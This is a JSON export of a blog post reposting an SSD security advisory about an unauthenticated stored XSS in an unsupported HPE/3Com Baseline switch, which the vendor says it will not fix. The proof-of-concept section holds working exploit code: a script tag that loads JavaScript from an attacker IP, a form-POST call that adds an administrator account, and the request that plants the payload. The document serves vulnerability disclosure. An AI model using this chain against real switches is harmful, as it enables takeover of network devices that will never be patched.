{"id":9966,"date":"2017-10-18T14:19:20","date_gmt":"2017-10-18T22:19:20","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/10\/18\/news-3739\/"},"modified":"2017-10-18T14:19:20","modified_gmt":"2017-10-18T22:19:20","slug":"news-3739","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/10\/18\/news-3739\/","title":{"rendered":"SSD Advisory \u2013 HPE Baseline Smart Gig SFP 24 Switch Pre-authentication Stored XSS"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz | Date: Wed, 18 Oct 2017 05:42:41 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:ssd@beyondsecurity.com\" id=\"a-href-3389\">ssd@beyondsecurity.com<\/a><\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerability Summary<\/strong><br \/> The following advisory describes an unauthenticated stored XSS in the HPE Baseline Smart Gig SFP 24 \/ 3Com Baseline Switch 2924 SFP Plus Switch.<\/p>\n<p>The vulnerability affects the following versions:<\/p>\n<ul>\n<li><u>Software Version<\/u>: 01.00.10<\/li>\n<li><u>Boot Version<\/u>: 1.0.0.14<\/li>\n<li><u>Hardware Version<\/u>: 01.01.0a<\/li>\n<\/ul>\n<p>&#8220;On April 12, 2010, Hewlett-Packard completed the acquisition of 3Com. Since the acquisition, 3Com has been fully absorbed by Hewlett-Packard and no longer exists as a separate entity.&#8221;<\/p>\n<p>Every 3Com model changed its identification number. 
The new HP name\/ID number for this switch is &#8220;HP Baseline Smart Gig SFP 24 &#8211; JE002A&#8221;.<\/p>\n<p>There is no other difference between 3CBLSG24 and JE002A.<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor response<\/strong><br \/> HPE was informed of the vulnerability; their response was: &#8220;This issue is not going to be resolved. We had hoped resources could be found to address the issue, but the business determined that the product is out of support life. It\u2019s been this way for several years. We hoped we could communicate something to customers about the product, but this switch is truly not supported in that way either.&#8221;<\/p>\n<p><span id=\"more-3389\"><\/span><\/p>\n<p><strong>Vulnerability details<\/strong><br \/> To trigger the vulnerability, all an attacker needs is unauthenticated access to the management web interface.<\/p>\n<p>When a user tries to log in with a wrong username and password, the failed login attempt is recorded on the Administration -> Logging [Display] page.<\/p>\n<p>Because the input controlled by the unauthenticated user in a failed login attempt is not sufficiently sanitized, the payload sent in the POST request of the failed login (http:\/\/IP\/config\/log_off_page.htm) is stored and later executed in the browser of an authenticated user who visits the log page.<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/3.png\" data-slb-active=\"1\" data-slb-asset=\"1774492158\" data-slb-internal=\"0\" data-slb-group=\"3389\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/3-300x105.png\" alt=\"\" width=\"300\" height=\"105\" class=\"alignnone size-medium wp-image-3390\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/3-300x105.png 300w, 
https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/3-768x270.png 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/3-1024x360.png 1024w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/3.png 1064w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><strong>Proof of Concept<\/strong><br \/> Setup:<\/p>\n<ul>\n<li><u>Switch IP<\/u>: 192.168.0.253<\/li>\n<li><u>Attacker IP<\/u>: 192.168.0.186 (Kali)<\/li>\n<\/ul>\n<p>The first step is to generate the JavaScript that we want to run in the victim&#8217;s browser.<\/p>\n<p>To do that, we wrote the following helper, which submits attacker-controlled parameters to a chosen URI as a POST request:<\/p>\n
<pre>\/\/ Usage: postwith(uri, params): builds a form with one input per key in params and POSTs it to uri\nfunction postwith(to, p) {\n  var myForm = document.createElement(\"form\");\n  myForm.method = \"post\";\n  myForm.action = to;\n  for (var k in p) {\n    var myInput = document.createElement(\"input\");\n    myInput.setAttribute(\"name\", k);\n    myInput.setAttribute(\"value\", p[k]);\n    myForm.appendChild(myInput);\n  }\n  document.body.appendChild(myForm);\n  myForm.submit();\n  document.body.removeChild(myForm);\n}<\/pre>\n
<p>The following call, placed after the helper, creates a valid request that adds a new administrator user named &#8220;SSD_USER&#8221; with password &#8220;SSD_USER&#8221;:<\/p>\n
<pre>\/\/ script.js: the postwith helper above, followed by this call\npostwith('http:\/\/192.168.0.253\/Athentication\/password_a.htm', {\n  'LocalUserTable$endVT': 'OK',\n  'rlAAALocalUserName$add': 'SSD_USER',\n  'rlAAALocalHostStatus$add': '4',\n  'rlAAALocalUserPassword$add': '$SSD_USER',\n  'rlAAALocalUserPrivilage$add': '15',\n  'LocalUserTable$endAdd': 'OK'\n});<\/pre>\n
<p>We save the output file (script.js) on the attacker&#8217;s machine.<\/p>\n<p>The second step is to write the payload that we want to send in the POST request to the vulnerable switch.<\/p>\n<p>The following snippet loads the file from step one and executes it:<\/p>\n
<pre>&lt;script&gt;document.write(\"&lt;script src=http:\/\/192.168.0.186\/script.js&gt;&lt;\/script&gt;\");&lt;\/script&gt;<\/pre>\n
<p>In the third step, we encode <em>&lt;script src=http:\/\/192.168.0.186\/script.js&gt;&lt;\/script&gt;<\/em> with base64 and send the following POST request, with the encoded payload in place of the placeholder:<\/p>\n
<pre>estoreUrl=&amp;errorCollector=&amp;rlEmWebMaxIdleTimeout=600&amp;rlIfNumOfPhPorts=24&amp;ModuleTable=OK&amp;rlPhdModuleTable%24VT=OK&amp;rlPhdModuleStackUnit%24VT=Type%3D0%3BAccess%3D1%3BNumOfEnumerations%3D0%3BRange0%3D%5B-2147483648%2C2147483647%5D&amp;rlPhdModuleIndex%24VT=Type%3D0%3BAccess%3D1%3BNumOfEnumerations%3D0%3BRange0%3D%5B-2147483648%2C2147483647%5D&amp;rlPhdModuleType%24VT=Type%3D0%3BAccess%3D1%3BNumOfEnumerations%3D0%3BRange0%3D%5B-2147483648%2C2147483647%5D&amp;ModuleTable%24endVT=OK&amp;userName%24query=\"&lt;===== PAYLOAD ======&gt;\"&amp;password%24query=asd<\/pre>\n
<p>Now we log in to the target switch and verify the user list in Administration > System Access.<\/p>\n<p>Then we trigger the vulnerability by going to the log page (Administration > Logging).<\/p>\n<p>Re-checking the user list shows that a new administrator user named &#8220;SSD_USER&#8221; has been added.<\/p>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3389\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/08\/3-300x105.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz | Date: Wed, 18 Oct 2017 05:42:41 +0000<\/strong><\/p>\n<p>Vulnerability Summary The following advisory describes an unauthenticated stored XSS in the HPE Baseline Smart Gig SFP 
24 \/ 3Com Baseline Switch 2924 SFP Plus Switch. The vulnerability affect versions: Software Version: 01.00.10 Boot version: 1.0.0.14 Hardware Version: 01.01.0a &#8220;On April 12, 2010, Hewlett-Packard completed the acquisition of 3Com. Since the acquisition, 3Com has been &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3389\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 HPE Baseline Smart Gig SFP 24 Switch Pre-authentication Stored XSS<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11640,10757,12136],"class_list":["post-9966","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-cross-site-scripting","tag-securiteam-secure-disclosure","tag-unauthenticated-action"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/9966","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=9966"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/9966\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=9966"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=9966"},{"taxonomy":"post_tag","embeddable":true,"href":"http:
\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=9966"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}